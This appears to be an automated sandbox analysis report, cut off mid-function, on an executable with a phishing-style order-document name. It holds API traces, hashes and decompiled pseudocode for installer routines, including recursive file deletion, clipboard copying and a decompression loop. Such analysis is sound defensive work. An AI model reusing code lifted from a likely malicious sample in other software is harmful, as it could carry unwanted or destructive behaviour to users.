0x004055c3
0x004055c6
0x004055c6
0x004055d6
0x004055dc
0x004055df
0x004055ea
0x004055ea
0x004055eb
0x004055ee
0x004055f5
0x004055fc
0x00405604
0x00405604
0x00405612
0x00405618
0x0040561b
0x0040561b
0x00405622
0x00405628
0x00405631
0x00405638
0x00405641
0x00405643
0x00405646
0x00405655
0x00405657
0x0040565a
0x0040565b
0x0040565e
0x0040565f
0x00405660
0x00405660
0x00405668
0x00405673
0x00405679
0x00405679
0x00000000
0x004055df
0x0040550f
0x00405515
0x00405543
0x00405545
0x0040554b
0x0040554d
0x00405556
0x00405556
0x0040555d
0x00000000
0x0040555d
0x00405519
0x00405523
0x00000000
0x004054e7
0x004054e7
0x004054ed
0x00405528
0x00000000
0x0040552f
0x004054f6
0x004054fd
0x00405502
0x00000000
0x00405502
0x004054e5
0x00405320
0x00405324
0x0040532c
0x00405330
0x00405333
0x00405336
0x00405339
0x0040533c
0x0040533d
0x0040533e
0x00405357
0x0040535a
0x00405364
0x00405373
0x0040537b
0x00405383
0x00405388
0x0040538b
0x00405397
0x004053a0
0x004053a9
0x004053cb
0x004053d1
0x004053e2
0x004053e7
0x004053f5
0x00405403
0x00405403
0x00405408
0x00405416
0x00405416
0x0040541b
0x0040541e
0x00405423
0x0040542f
0x00405438
0x00405445
0x00405454
0x00405447
0x0040544c
0x0040544c
0x00405460
0x00405460
0x00405474
0x0040547d
0x00405486
0x00405496
0x004054a2
0x004054a2
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040535D
GetDlgItem.USER32(?,000003EE), ref: 0040536C
GetClientRect.USER32(?,?), ref: 004053A9
GetSystemMetrics.USER32(00000002), ref: 004053B0
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004053D1
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004053E2
SendMessageA.USER32(?,00001001,00000000,?), ref: 004053F5
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405403
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405416
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405438
ShowWindow.USER32(?,00000008), ref: 0040544C
GetDlgItem.USER32(?,000003EC), ref: 0040546D
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040547D
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405496
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054A2
GetDlgItem.USER32(?,000003F8), ref: 0040537B

Part of subcall function 0040418F: SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D

GetDlgItem.USER32(?,000003EC), ref: 004054BE
CreateThread.KERNEL32(00000000,00000000,Function_00005292,00000000), ref: 004054CC
CloseHandle.KERNELBASE(00000000), ref: 004054D3
ShowWindow.USER32(00000000), ref: 004054F6
ShowWindow.USER32(?,00000008), ref: 004054FD
ShowWindow.USER32(00000008), ref: 00405543
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405577
CreatePopupMenu.USER32 ref: 00405588
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040559D
GetWindowRect.USER32(?,000000FF), ref: 004055BD
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055D6
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405612
OpenClipboard.USER32(00000000), ref: 00405622
EmptyClipboard.USER32 ref: 00405628
GlobalAlloc.KERNEL32(00000042,?), ref: 00405631
GlobalLock.KERNEL32(00000000), ref: 0040563B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564F
GlobalUnlock.KERNEL32(00000000), ref: 00405668
SetClipboardData.USER32(00000001,00000000), ref: 00405673
CloseClipboard.USER32 ref: 00405679

Strings

0B, xrefs: 004055EE

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: 0B
API String ID: 590372296-4132856435
Opcode ID: a5f5f3cc739424e5cf19656b71d36e7551af8bff60425fe1d738586fb9b1efc5
Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
Opcode Fuzzy Hash: a5f5f3cc739424e5cf19656b71d36e7551af8bff60425fe1d738586fb9b1efc5
Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68

Uniqueness

Uniqueness Score: -1.00%

Function 00405861 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405861(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B1F(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247c8 =  *0x4247c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406099(0x421d38, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405A78(_t73);
					} else {
						lstrcatA(0x421d38, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x421d38,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405A5C( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406099(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405819(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E004051C0(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247c8 =  *0x4247c8 + 1;
										} else {
											E004051C0(0xfffffff1, _t73);
											E00405E78(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405861(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d38 - 0x5c;
					if( *0x421d38 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040639C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A31(_t73);
							_t40 = E00405819(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E004051C0(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E004051C0(0xfffffff1, _t73);
							return E00405E78(_t72, _t73, 0);
						}
						L33:
						 *0x4247c8 =  *0x4247c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040586b
0x00405870
0x00405879
0x0040587c
0x00405884
0x00405887
0x0040588a
0x00405892
0x00405894
0x00405895
0x00000000
0x00405895
0x004058a0
0x004058a3
0x004058a3
0x004058a3
0x004058a7
0x004058ba
0x004058c1
0x004058c6
0x004058ca
0x004058da
0x004058cc
0x004058d2
0x004058d2
0x004058df
0x004058e2
0x004058ed
0x004058f3
0x004058f8
0x00405908
0x0040590a
0x00405910
0x00405913
0x00405916
0x004059ce
0x004059ce
0x004059d2
0x004059d4
0x004059d4
0x004059d4
0x004059d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040591c
0x0040591c
0x00405925
0x0040592b
0x00405930
0x00405933
0x00405935
0x00405939
0x0040593b
0x0040593b
0x00405939
0x0040593e
0x00405941
0x00405954
0x00405956
0x0040595b
0x00405962
0x0040597d
0x00405982
0x00405984
0x004059a8
0x00405986
0x00405986
0x00405989
0x0040599d
0x0040598b
0x0040598e
0x00405996
0x00405996
0x00405989
0x00405964
0x0040596a
0x0040596c
0x00405972
0x00405972
0x0040596c
0x00000000
0x00405962
0x00405943
0x00405946
0x00405948
0x00000000
0x00000000
0x0040594a
0x0040594c
0x00000000
0x00000000
0x0040594e
0x00405952
0x00000000
0x00000000
0x00000000
0x004059ad
0x004059b7
0x004059bd
0x004059bd
0x004059c8
0x00000000
0x004059c8
0x004058e4
0x004058eb
0x00000000
0x00000000
0x00000000
0x004058a9
0x004058a9
0x004058ab
0x004059d8
0x004059da
0x004059dd
0x00405a2e
0x00405a2e
0x00405a2e
0x004059df
0x004059e2
0x004059ed
0x004059f2
0x004059f4
0x00000000
0x00000000
0x004059f7
0x00405a03
0x00405a08
0x00405a0a
0x00000000
0x00405a25
0x00405a0c
0x00405a0f
0x00000000
0x00000000
0x00405a14
0x00000000
0x00405a1b
0x004059e4
0x004059e4
0x00000000
0x004059e4
0x004058b1
0x004058b4
0x00000000
0x00000000
0x00000000
0x004058b4

APIs

DeleteFileA.KERNELBASE(?,?,77313410,77312EE0,00000000), ref: 0040588A
lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,77313410,77312EE0,00000000), ref: 004058D2
lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,77313410,77312EE0,00000000), ref: 004058F3
lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,77313410,77312EE0,00000000), ref: 004058F9
FindFirstFileA.KERNELBASE(00421D38,?,?,?,0040A014,?,00421D38,?,?,77313410,77312EE0,00000000), ref: 0040590A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
FindClose.KERNEL32(00000000), ref: 004059C8

Strings

"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 00405861
\*.*, xrefs: 004058CC

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" $\*.*
API String ID: 2035342205-3397746493
Opcode ID: 077a36a50d83c1391667612b3efbe58f735d29fea3e92bce5bfb405d90697cf1
Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
Opcode Fuzzy Hash: 077a36a50d83c1391667612b3efbe58f735d29fea3e92bce5bfb405d90697cf1
Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E

Uniqueness

Uniqueness Score: -1.00%

Function 03514446 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

FWH=, xrefs: 035146F1
nW, xrefs: 035147A2
tLb , xrefs: 035144B6

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: FWH=$tLb $nW
API String ID: 0-4191011303
Opcode ID: 9c4b2d693534310f7ab516263f8ce2593c395acd417e9c7fda1807c1f79a5088
Instruction ID: 32a5a95bc9e6180c22cc7da314b0a1d6db9d7047ec5406f212f3741f0f03f563
Opcode Fuzzy Hash: 9c4b2d693534310f7ab516263f8ce2593c395acd417e9c7fda1807c1f79a5088
Instruction Fuzzy Hash: 0A02FEB212C6654FE71CDE39A8C60BE73A9FBC6321724D76FC483C64A7F92198438161

Uniqueness

Uniqueness Score: -1.00%

Function 00406725 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406725() {
				void* _t452;
				signed int _t453;
				signed int _t486;
				signed int* _t525;
				void* _t532;

				L0:
				while(1) {
					L0:
					if( *(_t532 - 0x40) != 0) {
						 *(_t532 - 0x34) = 1;
						 *(_t532 - 0x84) = 7;
						_t525 =  *(_t532 - 4) + 0x180 +  *(_t532 - 0x38) * 2;
						goto L117;
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							do {
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t216 = __edx + 1; // 0x1
									__ebx = _t216;
									__cx = __ax >> 5;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									goto L58;
								} else {
									if( *(__ebp - 0x6c) == 0) {
										 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
										goto L138;
									} else {
										__ecx =  *(__ebp - 0x70);
										__eax =  *(__ebp - 0xc);
										 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
										__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
										 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
										 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										_t202 = __ebp - 0x70;
										 *_t202 =  *(__ebp - 0x70) + 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										goto L58;
									}
								}
								goto L140;
								L58:
							} while (__ebx < 0x100);
							goto L54;
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											goto L53;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) >= 0x1000000) {
											continue;
										} else {
											if( *(__ebp - 0x6c) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
												goto L138;
											} else {
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t155 = __ebp - 0x70;
												 *_t155 =  *(__ebp - 0x70) + 1;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												continue;
											}
										}
										goto L140;
									}
									goto L53;
								} else {
									if(__ebx >= 0x100) {
										L53:
										_t172 = __ebp - 0x34;
										 *_t172 =  *(__ebp - 0x34) & 0x00000000;
										L54:
										__al =  *(__ebp - 0x44);
										 *(__ebp - 0x5c) =  *(__ebp - 0x44);
										if( *(__ebp - 0x64) == 0) {
											 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
											goto L138;
										} else {
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t191 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t191;
											L77:
											 *(__ebp - 0x14) = __edx;
											L78:
											 *((intOrPtr*)(__ebp - 0x88)) = 2;
											L1:
											_t452 =  *(_t532 - 0x88);
											if(_t452 > 0x1c) {
												L139:
												_t453 = _t452 | 0xffffffff;
											} else {
												switch( *((intOrPtr*)(_t452 * 4 +  &M00406FC8))) {
													case 0:
														if( *(_t532 - 0x6c) == 0) {
															goto L138;
														} else {
															 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
															 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
															_t452 =  *( *(_t532 - 0x70));
															if(_t452 > 0xe1) {
																goto L139;
															} else {
																_t456 = _t452 & 0x000000ff;
																_push(0x2d);
																asm("cdq");
																_pop(_t488);
																_push(9);
																_pop(_t489);
																_t528 = _t456 / _t488;
																_t458 = _t456 % _t488 & 0x000000ff;
																asm("cdq");
																_t523 = _t458 % _t489 & 0x000000ff;
																 *(_t532 - 0x3c) = _t523;
																 *(_t532 - 0x1c) = (1 << _t528) - 1;
																 *((intOrPtr*)(_t532 - 0x18)) = (1 << _t458 / _t489) - 1;
																_t531 = (0x300 << _t523 + _t528) + 0x736;
																if(0x600 ==  *((intOrPtr*)(_t532 - 0x78))) {
																	L10:
																	if(_t531 != 0) {
																		do {
																			_t531 = _t531 - 1;
																			 *((short*)( *(_t532 - 4) + _t531 * 2)) = 0x400;
																		} while (_t531 != 0);
																	}
																	 *(_t532 - 0x48) =  *(_t532 - 0x48) & 0x00000000;
																	 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
																	goto L15;
																} else {
																	if( *(_t532 - 4) != 0) {
																		GlobalFree( *(_t532 - 4));
																	}
																	_t452 = GlobalAlloc(0x40, 0x600); // executed
																	 *(_t532 - 4) = _t452;
																	if(_t452 == 0) {
																		goto L139;
																	} else {
																		 *((intOrPtr*)(_t532 - 0x78)) = 0x600;
																		goto L10;
																	}
																}
															}
														}
														goto L140;
													case 1:
														L13:
														__eflags =  *(_t532 - 0x6c);
														if( *(_t532 - 0x6c) == 0) {
															 *(_t532 - 0x88) = 1;
															goto L138;
														} else {
															 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
															 *(_t532 - 0x40) =  *(_t532 - 0x40) | ( *( *(_t532 - 0x70)) & 0x000000ff) <<  *(_t532 - 0x48) << 0x00000003;
															 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
															_t45 = _t532 - 0x48;
															 *_t45 =  *(_t532 - 0x48) + 1;
															__eflags =  *_t45;
															L15:
															if( *(_t532 - 0x48) < 4) {
																goto L13;
															} else {
																_t464 =  *(_t532 - 0x40);
																if(_t464 ==  *(_t532 - 0x74)) {
																	L20:
																	 *(_t532 - 0x48) = 5;
																	 *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) =  *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) & 0x00000000;
																	goto L23;
																} else {
																	 *(_t532 - 0x74) = _t464;
																	if( *(_t532 - 8) != 0) {
																		GlobalFree( *(_t532 - 8));
																	}
																	_t452 = GlobalAlloc(0x40,  *(_t532 - 0x40)); // executed
																	 *(_t532 - 8) = _t452;
																	if(_t452 == 0) {
																		goto L139;
																	} else {
																		goto L20;
																	}
																}
															}
														}
														goto L140;
													case 2:
														L24:
														_t471 =  *(_t532 - 0x60) &  *(_t532 - 0x1c);
														 *(_t532 - 0x84) = 6;
														 *(_t532 - 0x4c) = _t471;
														_t525 =  *(_t532 - 4) + (( *(_t532 - 0x38) << 4) + _t471) * 2;
														goto L117;
													case 3:
														L21:
														__eflags =  *(_t532 - 0x6c);
														if( *(_t532 - 0x6c) == 0) {
															 *(_t532 - 0x88) = 3;
															goto L138;
														} else {
															 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
															_t67 = _t532 - 0x70;
															 *_t67 =  &(( *(_t532 - 0x70))[1]);
															__eflags =  *_t67;
															 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
															L23:
															 *(_t532 - 0x48) =  *(_t532 - 0x48) - 1;
															if( *(_t532 - 0x48) != 0) {
																goto L21;
															} else {
																goto L24;
															}
														}
														goto L140;
													case 4:
														L118:
														_t449 =  *_t525;
														_t508 = _t449 & 0x0000ffff;
														_t483 = ( *(_t532 - 0x10) >> 0xb) * _t508;
														if( *(_t532 - 0xc) >= _t483) {
															 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t483;
															 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t483;
															 *(_t532 - 0x40) = 1;
															_t450 = _t449 - (_t449 >> 5);
															__eflags = _t450;
															 *_t525 = _t450;
														} else {
															 *(_t532 - 0x10) = _t483;
															 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
															 *_t525 = (0x800 - _t508 >> 5) + _t449;
														}
														if( *(_t532 - 0x10) >= 0x1000000) {
															goto L124;
														} else {
															goto L122;
														}
														goto L140;
													case 5:
														L122:
														if( *(_t532 - 0x6c) == 0) {
															 *(_t532 - 0x88) = 5;
															goto L138;
														} else {
															 *(_t532 - 0x10) =  *(_t532 - 0x10) << 8;
